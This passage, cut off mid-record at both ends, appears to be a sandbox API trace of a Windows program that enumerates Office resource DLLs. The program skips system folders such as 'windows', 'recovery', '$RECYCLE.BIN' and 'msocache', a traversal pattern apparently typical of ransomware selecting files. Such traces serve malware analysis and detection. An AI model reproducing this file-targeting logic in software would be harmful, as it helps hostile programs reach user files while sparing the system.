lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dba8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0125.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0125.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0125.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.836] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0e95c0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0e95c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc21a8ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8090, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0125.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d770, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0125.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0125.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0125.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0125.836] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6296213, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6296213, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14060, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.836] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0125.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dba8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0125.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0125.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0125.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0125.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0125.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0125.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.837] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2ee20e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f2e583, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a070, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0125.837] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0125.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0125.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d728, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0125.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0125.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0125.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dba8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0125.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0125.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0125.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.838] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e7d566, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e7d566, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x70ae8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0125.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d698, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0125.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0125.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244840 | out: hHeap=0x1e0000) returned 1 [0125.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.838] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37acc11, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37acc11, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37acc11, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15080, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.838] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0125.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0125.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dba8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0125.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0125.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0125.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dde8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0125.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0125.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0125.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.839] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf71003, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf71003, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xfe368d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaae0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0125.839] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0125.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0125.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0125.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0125.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.839] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc5d437d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc5d437d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc5fa5d2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4088, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0125.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0125.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0125.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0125.840] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0125.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0125.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d728, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0125.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0125.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0125.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d920, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0125.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0125.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0125.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0125.840] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5174318, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5174318, 